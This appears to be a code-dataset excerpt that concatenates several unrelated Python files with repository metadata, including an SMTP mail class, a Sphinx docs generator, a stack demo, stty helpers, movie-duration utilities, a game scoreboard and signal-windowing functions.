# Initialize to class definition variables
lstr_to = self.mlstr_to
str_from = self.mstr_from
str_subject = self.mstr_subject
str_body = self.mstr_body
lstr_attach = self.mlstr_attach
# Now override any that are spec'd in the **header
for field in header.keys():
if field == 'to': lstr_to = header[field]
if field == 'from': str_from = header[field]
if field == 'subject': str_subject = header[field]
if field == 'body': str_body = header[field]
if field == 'attach': lstr_attach = header[field]
self.reconstruct( lstr_to,
str_from,
str_subject,
str_body,
lstr_attach)
def __str__(self):
print 'mstr_obj\t\t= %s' % self.mstr_obj
print 'mstr_name\t\t= %s' % self.mstr_name
print 'm_id\t\t\t= %d' % self.m_id
print 'm_iter\t\t\t= %d' % self.m_iter
print 'm_verbosity\t\t= %d' % self.m_verbosity
print 'm_warnings\t\t= %d' % self.m_warnings
return 'This class implements simple functionality.'
def internals_check(self):
#
# POSTCONDITIONS
# o If mstr_SMTPserver is zero length (i.e. not set), script
# will terminate
#
if not len(self.mstr_SMTPserver):
self.error_exit('running ::internals_check()',
'it seems that the SMTP server has not been set.',
1)
def send(self):
#
# PRECONDITIONS
# o Internal components should be defined. At the very least
# this include:
#
# - mstr_body
# - mlstr_to
#
# POSTCONDITIONS
# o Thin dispatching layer to smtp_process()
# o Is used to present a uniform API
#
#self.debug_trace("Entering C_mail::send()")
self.smtp_process( self.mlstr_to,
self.mstr_from,
self.mstr_subject,
self.mstr_body,
self.mlstr_attach)
#self.debug_trace("Leaving C_mail::send()")
def send(self, **header):
#
# PRECONDITIONS
# **header:
#
# 'from', 'subject', 'body' : strings
# 'to', 'attach' : list of strings
#
#
# POSTCONDITIONS
# For each non-zero length input argument in
# 'header', temporarily ignore any internals and
# send a message using these overrides.
#
#self.debug_trace("Entering C_mail::send()")
lstr_to = self.mlstr_to
str_from = self.mstr_from
str_subject = self.mstr_subject
str_body = self.mstr_body
lstr_attach = self.mlstr_attach
for field in header.keys():
if field == 'to': lstr_to = header[field]
if field == 'sender': str_from = header[field]
if field == 'subject': str_subject = header[field]
if field == 'body': str_body = header[field]
if field == 'attach': lstr_attach = header[field]
self.smtp_process( lstr_to, str_from, str_subject,
str_body, lstr_attach)
#self.debug_trace("Leaving C_mail::send()")
def smtp_process(self, alstr_to,
astr_from,
astr_subject,
astr_body,
alstr_attach):
#
# PRECONDITIONS
# o Should only be called by one of the send() methods
# o Assumes that any attachments are valid files
#
# POSTCONDITIONS
# o Interacts with the SMTPlib module
#
self.internals_check()
msg = MIMEMultipart()
msg['Subject'] = astr_subject
msg['From'] = astr_from
msg.preamble = "This is a mult-part message in MIME format."
msg.attach(MIMEText(astr_body))
msg.epilogue = ''
for file in alstr_attach:
fp = open(file, 'rb')
img = MIMEImage(fp.read())
img.add_header('Content-ID', file)
fp.close()
msg.attach(img)
smtp = smtplib.SMTP()
smtp.connect(self.mstr_SMTPserver)
for str_to in alstr_to:
msg['To'] = str_to
smtp.sendmail(astr_from, str_to, msg.as_string())
smtp.close()
| 5,119 | 1,274 | 23 |
ad24952040f37c4dee236ba5635c947ea8283462 | 3,018 | py | Python | doc/sphinxext/gen_commands.py | stlukyanenko/mne-python | 508cfbc13bc2e068efb3bf8b7999b83047851729 | [
"BSD-3-Clause"
] | 2 | 2020-06-15T12:25:12.000Z | 2020-09-13T11:49:51.000Z | doc/sphinxext/gen_commands.py | Moonshadowzb/mne-python | 89647f3363fcb5de306cc18e55e7b9fa89fe0315 | [
"BSD-3-Clause"
] | null | null | null | doc/sphinxext/gen_commands.py | Moonshadowzb/mne-python | 89647f3363fcb5de306cc18e55e7b9fa89fe0315 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
import glob
from importlib import import_module
import os
from os import path as op
from mne.utils import _replace_md5, ArgvSetter
# Header markings go:
# 1. =/= : Page title
# 2. = : Command name
# 3. -/- : Command description
# 4. - : Command sections (Examples, Notes)
header = """\
:orphan:
.. _python_commands:
===============================
Command line tools using Python
===============================
.. contents:: Page contents
:local:
:depth: 1
"""
command_rst = """
.. _{0}:
{0}
{1}
.. rst-class:: callout
{2}
"""
# This is useful for testing/iterating to see what the result looks like
if __name__ == '__main__':
generate_commands_rst()
| 26.946429 | 75 | 0.549702 | # -*- coding: utf-8 -*-
import glob
from importlib import import_module
import os
from os import path as op
from mne.utils import _replace_md5, ArgvSetter
def setup(app):
    """Sphinx extension hook: rebuild the commands page when the builder starts."""
    app.connect('builder-inited', generate_commands_rst)
def setup_module():
    """No-op so nose does not treat :func:`setup` above as a module fixture."""
    # HACK: Stop nosetests running setup() above
    pass
# Header markings go:
# 1. =/= : Page title
# 2. = : Command name
# 3. -/- : Command description
# 4. - : Command sections (Examples, Notes)
header = """\
:orphan:
.. _python_commands:
===============================
Command line tools using Python
===============================
.. contents:: Page contents
:local:
:depth: 1
"""
command_rst = """
.. _{0}:
{0}
{1}
.. rst-class:: callout
{2}
"""
def generate_commands_rst(app=None):
    """Write generated/commands.rst from the ``--help`` output of every mne_*.py command.

    Each command module is imported and run with a faked ``--help`` argv;
    the captured output is massaged into reStructuredText and the file is
    only replaced when its MD5 changes (``_replace_md5``).
    """
    from sphinx_gallery import sphinx_compatibility
    out_dir = op.abspath(op.join(op.dirname(__file__), '..', 'generated'))
    if not op.isdir(out_dir):
        os.mkdir(out_dir)
    out_fname = op.join(out_dir, 'commands.rst.new')
    command_path = op.abspath(
        op.join(os.path.dirname(__file__), '..', '..', 'mne', 'commands'))
    fnames = sorted([
        op.basename(fname)
        for fname in glob.glob(op.join(command_path, 'mne_*.py'))])
    iterator = sphinx_compatibility.status_iterator(
        fnames, 'generating MNE command help ... ', length=len(fnames))
    with open(out_fname, 'w') as f:
        f.write(header)
        for fname in iterator:
            cmd_name = fname[:-3]
            module = import_module('.' + cmd_name, 'mne.commands')
            # Run the command with a faked argv; --help exits via SystemExit.
            with ArgvSetter(('mne', cmd_name, '--help')) as out:
                try:
                    module.run()
                except SystemExit:  # this is how these terminate
                    pass
            output = out.stdout.getvalue().splitlines()
            # Swap usage and title lines
            output[0], output[2] = output[2], output[0]
            # Add header marking
            for idx in (1, 0):
                output.insert(idx, '-' * len(output[0]))
            # Add code styling for the "Usage: " line
            for li, line in enumerate(output):
                if line.startswith('Usage: mne '):
                    output[li] = 'Usage: ``%s``' % line[7:]
                    break
            # Turn "Options:" into field list
            if 'Options:' in output:
                ii = output.index('Options:')
                output[ii] = 'Options'
                output.insert(ii + 1, '-------')
                output.insert(ii + 2, '')
                output.insert(ii + 3, '.. rst-class:: field-list cmd-list')
                output.insert(ii + 4, '')
            output = '\n'.join(output)
            cmd_name_space = cmd_name.replace('mne_', 'mne ')
            f.write(command_rst.format(
                cmd_name_space, '=' * len(cmd_name_space), output))
    _replace_md5(out_fname)
# This is useful for testing/iterating to see what the result looks like
if __name__ == '__main__':
generate_commands_rst()
| 2,239 | 0 | 69 |
4a9be3555eaaee67ccdb9ee787c8bae77b9e23da | 796 | py | Python | 2_stack.py | Akshatha-Jagadish/Data_structures | 3a2833e4f8ffa26127ba661708b45ccfac141484 | [
"MIT"
] | null | null | null | 2_stack.py | Akshatha-Jagadish/Data_structures | 3a2833e4f8ffa26127ba661708b45ccfac141484 | [
"MIT"
] | null | null | null | 2_stack.py | Akshatha-Jagadish/Data_structures | 3a2833e4f8ffa26127ba661708b45ccfac141484 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Sat Jan 22 15:31:32 2022
@author: Akshatha
"""
if __name__ == '__main__':
my_stack = Stack()
my_stack.push(5)
my_stack.disp()
my_stack.push(10)
my_stack.disp()
my_stack.push('game')
my_stack.disp()
print('stack length: ',my_stack.length())
print('popped element: ',my_stack.pop())
my_stack.disp()
print('stack length: ',my_stack.length()) | 21.513514 | 46 | 0.53392 | # -*- coding: utf-8 -*-
"""
Created on Sat Jan 22 15:31:32 2022
@author: Akshatha
"""
class Stack():
    """Minimal LIFO stack backed by a Python list (end of list = top)."""
    def __init__(self):
        # underlying storage; the last element is the top of the stack
        self.arr = []
    def push(self, value):
        """Place ``value`` on top of the stack."""
        self.arr.append(value)
    def pop(self):
        """Remove and return the top element.

        Raises IndexError on an empty stack, just as the original
        ``self.arr[-1]`` indexing did.  Uses list.pop(), which is O(1),
        instead of the original O(n) slice copy.
        """
        return self.arr.pop()
    def length(self):
        """Return the number of elements currently stored."""
        return len(self.arr)
    def disp(self):
        """Print the underlying list, bottom to top."""
        print(self.arr)
# Demo: exercise push/pop/length/disp with mixed value types.
if __name__ == '__main__':
    my_stack = Stack()
    my_stack.push(5)
    my_stack.disp()
    my_stack.push(10)
    my_stack.disp()
    my_stack.push('game')
    my_stack.disp()
    print('stack length: ',my_stack.length())
    print('popped element: ',my_stack.pop())
    my_stack.disp()
    print('stack length: ',my_stack.length())
print('stack length: ',my_stack.length()) | 174 | -7 | 184 |
317da283fcdc4837339ad34e5ee32af0b8601139 | 1,090 | py | Python | src/python/pants/console/stty_utils.py | lahosken/pants | 1b0340987c9b2eab9411416803c75b80736716e4 | [
"Apache-2.0"
] | 1 | 2021-11-11T14:04:24.000Z | 2021-11-11T14:04:24.000Z | src/python/pants/console/stty_utils.py | lahosken/pants | 1b0340987c9b2eab9411416803c75b80736716e4 | [
"Apache-2.0"
] | null | null | null | src/python/pants/console/stty_utils.py | lahosken/pants | 1b0340987c9b2eab9411416803c75b80736716e4 | [
"Apache-2.0"
] | 1 | 2021-11-11T14:04:12.000Z | 2021-11-11T14:04:12.000Z | # coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import subprocess
from contextlib import contextmanager
@contextmanager
def preserve_stty_settings():
"""Run potentially stty-modifying operations, e.g., REPL execution, in this contextmanager."""
stty_settings = STTYSettings()
stty_settings.save_stty_options()
yield
stty_settings.restore_ssty_options()
class STTYSettings(object):
"""Saves/restores stty settings, e.g., during REPL execution."""
| 29.459459 | 96 | 0.73945 | # coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import subprocess
from contextlib import contextmanager
@contextmanager
def preserve_stty_settings():
  """Run potentially stty-modifying operations, e.g., REPL execution, in this contextmanager.

  BUGFIX: restoration now happens in a ``finally`` clause, so terminal
  settings are restored even when the wrapped block raises (the original
  skipped restoration on error, leaving the terminal modified).
  """
  stty_settings = STTYSettings()
  stty_settings.save_stty_options()
  try:
    yield
  finally:
    stty_settings.restore_ssty_options()
class STTYSettings(object):
  """Saves/restores stty settings, e.g., during REPL execution."""
  def __init__(self):
    # Raw `stty -g` snapshot; None until save_stty_options() is called.
    self._stty_options = None
  def save_stty_options(self):
    """Capture the current terminal settings via `stty -g`."""
    self._stty_options = self._run_cmd('stty -g 2>/dev/null')
  def restore_ssty_options(self):
    """Restore the settings captured by save_stty_options().

    NOTE: the name carries a historical typo ('ssty'); it is kept for
    existing callers.  Prefer the correctly spelled alias below.
    """
    self._run_cmd('stty ' + self._stty_options)
  # Correctly spelled, backward-compatible alias for the typo'd method.
  restore_stty_options = restore_ssty_options
  def _run_cmd(self, cmd):
    """Run `cmd` through the shell and return its captured stdout."""
    po = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
    stdout, _ = po.communicate()
    return stdout
| 276 | 0 | 100 |
fb0177bda93cb54ce6c6923044aa8511c1218c01 | 1,179 | py | Python | flapp/movie/utils.py | rpwagner/tiled-display | 52d135bc163360fe55ce5521784b0ef48a8c82c9 | [
"Apache-2.0"
] | 1 | 2020-12-11T17:11:45.000Z | 2020-12-11T17:11:45.000Z | flapp/movie/utils.py | rpwagner/tiled-display | 52d135bc163360fe55ce5521784b0ef48a8c82c9 | [
"Apache-2.0"
] | null | null | null | flapp/movie/utils.py | rpwagner/tiled-display | 52d135bc163360fe55ce5521784b0ef48a8c82c9 | [
"Apache-2.0"
] | null | null | null | from subprocess import Popen, PIPE, STDOUT
if __name__=="__main__":
import sys
path = sys.argv[1]
duration = GetMovieDuration(path)
FPS = GetMovieFPS(path)
print "duration:", duration
print "FPS:", FPS
| 35.727273 | 132 | 0.63698 | from subprocess import Popen, PIPE, STDOUT
def GetMovieFPS(path):
    """Parse the frame rate of the movie at *path* from mplayer's banner.

    Plays one second through the null video driver with no sound and
    reads the value preceding the "fps" token on the "VIDEO: " line.
    """
    cmd = ["mplayer", "-vo", "null", "-nosound", path, "-endpos", "00:00:01"]
    banner = Popen(cmd, stdout=PIPE, stderr=STDOUT).communicate()[0]
    start = banner.index("VIDEO: ")
    video_line = banner[start:banner.index("\n", start)]
    tokens = video_line.split()
    return float(tokens[tokens.index("fps") - 1])
def GetMovieDuration(path):
    """Return the movie duration in seconds, parsed from ffmpeg's header output."""
    info = Popen(["ffmpeg", "-i", path], stdout=PIPE, stderr=STDOUT).communicate()[0]
    marker = "Duration: "
    begin = info.index(marker) + len(marker)
    stamp = info[begin:info.index(", start: ")]
    hours, mins, secs = stamp.split(":")
    return float(hours) * 3600 + float(mins) * 60 + float(secs)
# CLI entry point: report duration and fps for the movie path in argv[1].
if __name__=="__main__":
    import sys
    path = sys.argv[1]
    duration = GetMovieDuration(path)
    FPS = GetMovieFPS(path)
    print "duration:", duration
    print "FPS:", FPS
d1639147923531e200dc36009221eecdaf434140 | 1,931 | py | Python | dkbirdisland/src/scoreboard.py | Murilo-Gruppi/DonkeyKong-BirdIsland | 2fe5affe570e9d7c82d0f2e2e8b2c2e1ff49f1df | [
"MIT"
] | null | null | null | dkbirdisland/src/scoreboard.py | Murilo-Gruppi/DonkeyKong-BirdIsland | 2fe5affe570e9d7c82d0f2e2e8b2c2e1ff49f1df | [
"MIT"
] | 8 | 2020-11-14T13:06:58.000Z | 2021-01-22T14:31:06.000Z | dkbirdisland/src/scoreboard.py | Murilo-Gruppi/DonkeyKong-BirdIsland | 2fe5affe570e9d7c82d0f2e2e8b2c2e1ff49f1df | [
"MIT"
] | 3 | 2020-11-13T23:11:28.000Z | 2020-12-14T15:41:08.000Z | import shelve
import os
from . import tools
MAIN_DIR = os.path.split(os.path.abspath(__file__))[0]
SHELVE_PATH = os.path.join(MAIN_DIR, 'high_score.txt')
| 31.655738 | 94 | 0.588296 | import shelve
import os
from . import tools
MAIN_DIR = os.path.split(os.path.abspath(__file__))[0]
SHELVE_PATH = os.path.join(MAIN_DIR, 'high_score.txt')
class Scoreboard:
    """Score display: tracks the running score, last score, and the persisted high score.

    Persistence uses a shelve file at SHELVE_PATH with keys 'hi' (high
    score) and 'score' (last score); values are zero-padded 5-character
    strings.  ``screen`` is presumably a pygame-style surface with
    ``blit`` — confirm against callers.
    """
    def __init__(self, screen):
        # Scores are kept as zero-padded strings for direct rendering.
        self.score = '00000'
        self.last_score = '00000'
        self.high_score = '00000'
        self.font = tools.load_font('ARCADEPI.ttf', 23)
        self.color = (255, 255, 255)
        # Load persisted scores, if any.
        d = shelve.open(SHELVE_PATH)
        if 'hi' in d:
            self.high_score = d['hi']
        if 'score' in d:
            self.last_score = d['score']
        self.high_score_text = self.font.render(self.high_score, False, (255, 255, 255))
        self.scoreboard = self.font.render(self.score, False, (255, 255, 255))
        d.close()
    def display(self, screen):
        # Draw "HI <high score>" and the current score along the top edge.
        screen.blit(self.font.render("HI", False, (255, 255, 255)), (550, 5))
        screen.blit(self.high_score_text, (590, 5))
        screen.blit(self.scoreboard, (705, 5))
    def update(self):
        # Increment the score by one and re-render its text surface.
        self.score = int(self.score) + 1
        self.score = f'{self.score:05}'
        self.scoreboard = self.font.render(self.score, False, (255, 255, 255))
    def add(self):
        # Persist the current score, updating the high score if beaten.
        d = shelve.open(SHELVE_PATH)
        d['score'] = self.score
        if int(self.score) > int(self.high_score):
            d['hi'] = self.score
            self.high_score = self.score
            self.high_score_text = self.font.render(self.high_score, False, (255, 255, 255))
        d.close()
    def draw(self, screen, verify):
        # Draw the last score; when verify is True, tag it "NEW HI" in yellow.
        if verify:
            self.color = (255, 255, 0)
            self.scoreboard = self.font.render('NEW HI ' + self.last_score, False, self.color)
            screen.blit(self.scoreboard, (586, 5))
        else:
            self.scoreboard = self.font.render(self.last_score, False, self.color)
            screen.blit(self.scoreboard, (705, 5))
    def new_hi(self):
        # True when the most recently saved score equals the high score.
        return self.last_score == self.high_score
| 1,595 | -4 | 184 |
5bd889de96b25a5a3fe57826cba7a42808b9ad07 | 441 | py | Python | chopandmiddle.py | hadoge/simpleScripts_python | bc819dfd73a3fb62444c7915f8dab665930475c8 | [
"MIT"
] | null | null | null | chopandmiddle.py | hadoge/simpleScripts_python | bc819dfd73a3fb62444c7915f8dab665930475c8 | [
"MIT"
] | null | null | null | chopandmiddle.py | hadoge/simpleScripts_python | bc819dfd73a3fb62444c7915f8dab665930475c8 | [
"MIT"
] | null | null | null | #Script made for learn diferences on list modification
t = [2,1,3,4,5]
p = [2,1,3,4,5]
chop(p)
print(p)
print(chop(p))
middle(t)
print(t)
print(middle(t))
| 16.333333 | 82 | 0.589569 | #Script made for learn diferences on list modification
t = [2,1,3,4,5]
p = [2,1,3,4,5]
def chop(b):
    """Remove the first and last elements of list *b* in place."""
    del b[-1]
    del b[0]
    return None  # the list is modified in place; nothing useful is returned
def middle(b):
    """Return a new list with the first and last elements of *b* dropped."""
    return b[1:-1]  # slicing copies; *b* itself is left unmodified
# Demonstrate the in-place mutator vs. the copying accessor.
chop(p)
print(p)           # p has lost its first and last elements
print(chop(p))     # chop returns None; it only mutates its argument
middle(t)
print(t)           # t is unchanged; middle returned a new list
print(middle(t))
| 219 | 0 | 48 |
ed44fe26c8727b8eefba67eef26c7e2279a0496c | 41,686 | py | Python | vibrationtesting/signals.py | Vibration-Testing/vibrationtesting | b5b85bc036714e8d8e99a14a4ddc2c427dae80ee | [
"MIT"
] | 34 | 2016-06-21T11:44:26.000Z | 2021-09-29T07:28:22.000Z | vibrationtesting/signals.py | bagustris/vibrationtesting | b5b85bc036714e8d8e99a14a4ddc2c427dae80ee | [
"MIT"
] | 25 | 2017-08-26T14:07:16.000Z | 2021-07-27T09:57:31.000Z | vibrationtesting/signals.py | bagustris/vibrationtesting | b5b85bc036714e8d8e99a14a4ddc2c427dae80ee | [
"MIT"
] | 25 | 2016-03-08T19:58:11.000Z | 2021-08-01T23:03:41.000Z | """
Signal processing, creation and plotting.
Analysis of data and generation of simulated experiments.
"""
__license__ = "Joseph C. Slater"
__docformat__ = 'reStructuredText'
# import warnings
import numpy as np
import scipy as sp
import scipy.fftpack as fftpack
import scipy.linalg as la
import matplotlib.pyplot as plt
import scipy.integrate as spi
import scipy.signal as signal
"""
Notes:
------
Sept. 3, 2016
Development of windows in scipy.signal has been rapid and
determining what I should build into this module, or simply leverage
from scipy.signal has been a moving target.
It's now apparent that creating or returning a window is pointless. Further,
Applying should be a relatively simple code obviating much of any need for the
code here.
The cross spectrum analysis formerly lacking is now available, periodogram
is usually the best option, however not with impulse excitations. See
`scipy.signal` for this. Unfortunately, the conventions in this module are not
consistent with `scipy.signal`. They follow those of `python-control`
FRF calculation is typically trivial, Hv being an expected gap long term
MIMO FRF calculation is an open question. Pretty printing of FRFs is always
a welcome tool.
System ID is likely the remaining missing aspect at this time.
In order to be consistent with the Control Systems Library, increasing time
or increasing frequency steps positively with increased column number (one
dimension). Rows (0 dimension)
correspond to appropriate channels, output numbers, etc.
For cross spectrum data (cross spectrum density, frequency response function)
the 2 dimension represents the input channel.
The last dimension (2 or 3) indexes each data instance (experiment). That means
that an unaveraged cross spectrum density has dimension 4. If there is only a
single input channel, it is imperative to insist the dimension exists, even if
only length 1. This is analogous to a vector being Nx1 versus simply a
1-D array of length 1.
http://python-control.readthedocs.io/en/latest/conventions.html#time-series-data
Problem: This hasn't been fully implemented.
"""
def window(x, windowname='hanning', normalize=False):
    r"""Create leakage window.

    Create a window of length :math:`x`, or a window sized to match
    :math:`x` so that :math:`x\times w` is the windowed result.

    Parameters
    ----------
    x: integer, float array
        | If integer- number of points in desired window.
        | If array- array provides size of window returned.
    windowname: string
        One of: hanning, hamming, blackman, flatwin, boxwin
    normalize: bool, optional(False)
        Adjust power level (for use in ASD) to 1

    Returns
    -------
    w: float array
        | window array of size x
        | window array. Windowed array is then :math:`x\times w`

    Notes
    -----
    Fixes relative to the original implementation:

    - string comparisons use ``==`` instead of the identity operator
      ``is`` (identity of str literals is a CPython interning accident)
    - a length-1 1-D input now raises ``ValueError`` instead of crashing
      later with ``UnboundLocalError``
    - ``N`` is defined in the 2-D branch so ``normalize=True`` works there
    - run-on whitespace inside continuation-line print messages removed
    """
    if isinstance(x, (list, tuple, np.ndarray)):
        # Build a windowing array of dimension n x N (x nr) where N is the
        # number of samples (axis 1), n the number of channels (axis 0)
        # and nr the number of records (axis 2).
        swap = 0
        if len(x.shape) == 1:
            if x.shape[0] == 1:
                raise ValueError('x is a scalar (length-1 array); cannot '
                                 'size a window from it.')
            else:
                N = len(x)
                f = window(N, windowname=windowname)
        elif len(x.shape) == 3:
            if x.shape[0] > x.shape[1]:
                x = np.swapaxes(x, 0, 1)
                swap = 1
                print('You shouldn\'t do that.')
                print('The 1 dimension is the time (or frequency) '
                      'incrementing dimension.')
                print('Swapping axes temporarily to be compliant with '
                      'expectations. I\'ll fix them in your result')
            N = x.shape[1]
            f = window(N, windowname=windowname)
            f, _, _ = np.meshgrid(f, np.arange(
                x.shape[0]), np.arange(x.shape[2]))
            if swap == 1:
                f = np.swapaxes(f, 0, 1)
        elif len(x.shape) == 2:
            if x.shape[0] > x.shape[1]:
                x = np.swapaxes(x, 0, 1)
                swap = 1
                print('You shouldn\'t do that.')
                print('The 1 dimension is the time (or frequency) ' +
                      'incrementing dimension.')
                print('Swapping axes temporarily to be compliant with ' +
                      'expectations.')
                print('I\'ll reluctantly return a transposed result.')
            N = x.shape[1]  # so normalize=True also works for 2-D input
            f = window(N, windowname=windowname)
            f, _ = np.meshgrid(f, np.arange(x.shape[0]))
            if swap == 1:
                f = np.swapaxes(f, 0, 1)
    else:
        N = x
        if windowname == 'hanning':
            f = np.sin(np.pi * np.arange(N) / (N - 1))**2 * np.sqrt(8 / 3)
        elif windowname == 'hamming':
            f = (0.54 - 0.46 * np.cos(2 * np.pi * (np.arange(N)) / (N - 1)))\
                * np.sqrt(5000 / 1987)
        elif windowname == 'blackman':
            print('blackman')
            f = (0.42 - 0.5 * np.cos(2 * np.pi * (np.arange(N) + .5) / (N))
                 + .08 * np.cos(4 * np.pi * (np.arange(N) + .5) / (N)))\
                * np.sqrt(5000 / 1523)
        elif windowname == 'flatwin':
            f = 1.0 - 1.933 * np.cos(2 * np.pi * (np.arange(N)) / (N - 1))\
                + 1.286 * np.cos(4 * np.pi * (np.arange(N)) / (N - 1))\
                - 0.338 * np.cos(6 * np.pi * (np.arange(N)) / (N - 1))\
                + 0.032 * np.cos(8 * np.pi * (np.arange(N)) / (N - 1))
        elif windowname == 'boxwin':
            f = np.ones((1, N))
        else:
            f = np.ones((1, N))
            print("I don't recognize window name ", windowname, ". Sorry.")
    if normalize is True:
        f = f / la.norm(f) * np.sqrt(N)
    return f
def hanning(x, normalize=False):
    r"""Return hanning window.

    Create a hanning window of length :math:`x`, or a hanning window
    sized to match :math:`x` so that :math:`x\times w` is the windowed
    result.

    Parameters
    ----------
    x: integer, float array
        | If integer- number of points in desired hanning window.
        | If array- array provides size of window returned.
    normalize: bool, optional(False)
        Adjust power level (for use in ASD) to 1

    Returns
    -------
    w: float array
        | window array of size x
        | window array. Windowed array is then :math:`x\times w`

    Notes
    -----
    Fixes relative to the original implementation:

    - a length-1 1-D input now raises ``ValueError`` instead of crashing
      later with ``UnboundLocalError``
    - ``N`` is defined in the 2-D and 3-D branches so ``normalize=True``
      no longer raises ``NameError`` for matrix/3-D input
    - run-on whitespace inside continuation-line print messages removed
    """
    if isinstance(x, (list, tuple, np.ndarray)):
        # Build a Hanning windowing array of dimension n x N (x nr): N is
        # the number of samples, n the number of channels, nr the records.
        swap = 0
        if len(x.shape) == 1:
            if x.shape[0] == 1:
                raise ValueError('x is a scalar (length-1 array); cannot '
                                 'size a window from it.')
            else:
                N = len(x)
                f = hanning(N)
        elif len(x.shape) == 3:
            if x.shape[0] > x.shape[1]:
                x = np.swapaxes(x, 0, 1)
                swap = 1
                print('Swapping axes temporarily to be compliant with '
                      'expectations. I\'ll fix them in your result')
            N = x.shape[1]
            f = hanning(N)
            f, _, _ = np.meshgrid(f, np.arange(
                x.shape[0]), np.arange(x.shape[2]))
            if swap == 1:
                f = np.swapaxes(f, 0, 1)
        elif len(x.shape) == 2:
            if x.shape[0] > x.shape[1]:
                x = np.swapaxes(x, 0, 1)
                swap = 1
                print('Swapping axes temporarily to be compliant with '
                      'expectations. I\'ll fix them in your result')
            N = x.shape[1]
            f = hanning(N)
            f, _ = np.meshgrid(f, np.arange(x.shape[0]))
            if swap == 1:
                f = np.swapaxes(f, 0, 1)
    else:
        # Create hanning window of length x
        N = x
        f = np.sin(np.pi * np.arange(N) / (N - 1))**2 * np.sqrt(8 / 3)
    if normalize is True:
        f = f / la.norm(f) * np.sqrt(N)
    return f
def blackwin(x):
    """Return the n point Blackman window.

    Returns x as the Blackman windowing array x_window
    The windowed signal is then x*x_window

    Parameters
    ----------
    x: integer, float array
        Number of points, or array whose shape sizes the returned window.

    Returns
    -------
    f: float array
        Blackman window, scaled so its Frobenius norm is sqrt(n).
    """
    print('blackwin is untested')
    if isinstance(x, (list, tuple, np.ndarray)):
        n = x.shape[1]
        f = blackwin(n)
        if len(x.shape) == 3:
            f, _, _ = np.meshgrid(f[0, :], np.arange(
                x.shape[0]), np.arange(x.shape[2]))
        else:
            f, _ = np.meshgrid(f[0, :], np.arange(x.shape[0]))
    else:
        n = x
        # BUGFIX: the original divided the *cosine* by n instead of the
        # cosine's argument, i.e. cos(2*pi*(k+.5))/n rather than
        # cos(2*pi*(k+.5)/n).  Corrected to match the blackman branch of
        # window().
        f = np.reshape((0.42
                        - 0.5 * np.cos(2 * np.pi * (np.arange(n) + .5) / n)
                        + .08 * np.cos(4 * np.pi * (np.arange(n) + .5) / n))
                       * np.sqrt(5000 / 1523), (1, -1))
    f = f / la.norm(f) * np.sqrt(n)
    return f
def expwin(x, ts=.75):
    """Return the n point exponential window.

    Returns x as the expwin windowing array x_windowed
    The windowed signal is then x*x_window
    The optional second argument sets the 5% "settling time" of the
    window. Default is ts=0.75

    Parameters
    ----------
    x: integer, float array
        Number of points, or array whose shape sizes the returned window.
    ts: float, optional(0.75)
        5% settling time (fraction of the record length).

    Returns
    -------
    f: float array
        Exponential window, normalized to norm sqrt(n).
    """
    print('expwin is untested')
    tc = -ts / np.log(.05)
    if isinstance(x, (list, tuple, np.ndarray)):
        n = x.shape[1]
        # BUGFIX: the original called expwin(n) here, silently dropping
        # the caller's ts and always using the default settling time.
        f = expwin(n, ts)
        if len(x.shape) == 3:
            f, _, _ = np.meshgrid(f[0, :], np.arange(
                x.shape[0]), np.arange(x.shape[2]))
        else:
            f, _ = np.meshgrid(f[0, :], np.arange(x.shape[0]))
    else:
        n = x
        v = (n - 1) / n * np.arange(n) + (n - 1) / n / 2
        f = np.exp(-v / tc / (n - 1))
        f = f / la.norm(f) * np.sqrt(n)
        f = np.reshape(f, (1, -1))
    f = f / la.norm(f) * np.sqrt(n)
    return f
def hammwin(x):
    """Return the n point hamming window.

    Returns x as the hamming windowing array x_windowed
    The windowed signal is then x*x_window
    """
    print('hammwin is untested')
    if not isinstance(x, (list, tuple, np.ndarray)):
        # Scalar: build the window itself.
        n = x
        k = np.arange(n)
        f = 0.54 - 0.46 * np.cos(2 * np.pi * k / (n - 1))
        f = np.reshape(f * np.sqrt(5000 / 1987), (1, -1))
    else:
        # Array: size the window from axis 1, replicate over channels
        # (and records for 3-D input).
        n = x.shape[1]
        f = hammwin(n)
        if len(x.shape) == 3:
            f, _, _ = np.meshgrid(f[0, :], np.arange(x.shape[0]),
                                  np.arange(x.shape[2]))
        else:
            f, _ = np.meshgrid(f[0, :], np.arange(x.shape[0]))
    f = f / la.norm(f) * np.sqrt(n)
    return f
def flatwin(x):
    """Return the n point flat top window.

    x_windows=flatwin(x)

    Returns x as the flat top windowing array x_windowed
    The windowed signal is then x*x_window

    McConnell, K. G., "Vibration Testing: Theory and Practice," Wiley, 1995.
    """
    print('flatwin is untested')
    if not isinstance(x, (list, tuple, np.ndarray)):
        # Scalar: build the window from the four-term cosine series.
        n = x
        theta = 2 * np.pi * np.arange(n) / (n - 1)
        f = np.reshape(1.0 - 1.933 * np.cos(theta)
                       + 1.286 * np.cos(2 * theta)
                       - 0.338 * np.cos(3 * theta)
                       + 0.032 * np.cos(4 * theta), (1, -1))
    else:
        # Array: size the window from axis 1, replicate over channels
        # (and records for 3-D input).
        n = x.shape[1]
        f = flatwin(n)
        if len(x.shape) == 3:
            f, _, _ = np.meshgrid(f[0, :], np.arange(x.shape[0]),
                                  np.arange(x.shape[2]))
        else:
            f, _ = np.meshgrid(f[0, :], np.arange(x.shape[0]))
    f = f / la.norm(f) * np.sqrt(n)
    return f
def boxwin(x):
    """Return the n point box window (uniform).

    Returns x as the boxwin windowing array x_windowed; the windowed
    signal is then x*x_window.
    """
    print('boxwin is untested')
    if not isinstance(x, (list, tuple, np.ndarray)):
        # Scalar: uniform taps; unit-power scaling leaves them at 1.
        npts = x
        taps = np.ones((1, npts))
        return taps / la.norm(taps) * np.sqrt(npts)
    # Array: tile a matching-length window across channels/records and
    # rescale for unit power over the whole array.
    npts = x.shape[1]
    base = boxwin(npts)[0, :]
    if x.ndim == 3:
        taps, _, _ = np.meshgrid(base, np.arange(x.shape[0]),
                                 np.arange(x.shape[2]))
